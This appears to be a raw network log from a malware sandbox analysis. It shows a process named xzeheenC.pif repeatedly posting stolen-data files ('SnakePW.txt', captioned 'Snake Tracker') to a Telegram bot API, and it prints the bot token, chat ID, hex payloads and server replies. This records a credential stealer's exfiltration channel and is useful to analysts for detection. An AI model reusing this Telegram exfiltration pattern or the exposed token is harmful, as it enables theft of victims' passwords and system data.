                                                                                                                      2024-12-18 15:18:00 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20c4261497b1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:00 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 63 34 32 36 31 34 39 37 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20c4261497b1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:01 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:01 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 517
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:01 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418875,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535081,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      35192.168.2.549929149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:01 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd216ef987af00
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:01 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 36 65 66 39 38 37 61 66 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd216ef987af00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:01 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:01 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:01 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418876,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535081,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      36192.168.2.549934149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:02 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20be100b0715
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:02 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 62 65 31 30 30 62 30 37 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20be100b0715Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:03 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:03 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:03 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418880,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535083,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      37192.168.2.549936149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:02 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20d938fe0172
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:02 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 39 33 38 66 65 30 31 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20d938fe0172Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:03 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:03 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:03 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418882,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535083,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      38192.168.2.549937149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:03 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd218ddbcb8c7b
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:03 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 38 64 64 62 63 62 38 63 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd218ddbcb8c7bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:03 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:03 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:03 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418884,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535083,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      39192.168.2.549941149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:04 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20d7324cb693
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:04 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 37 33 32 34 63 62 36 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20d7324cb693Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:05 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:05 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:05 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418886,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535085,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      40192.168.2.549943149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:04 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20ef893a5471
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:04 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 65 66 38 39 33 61 35 34 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd20ef893a5471Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:05 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:05 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:05 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 38 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418888,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535085,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
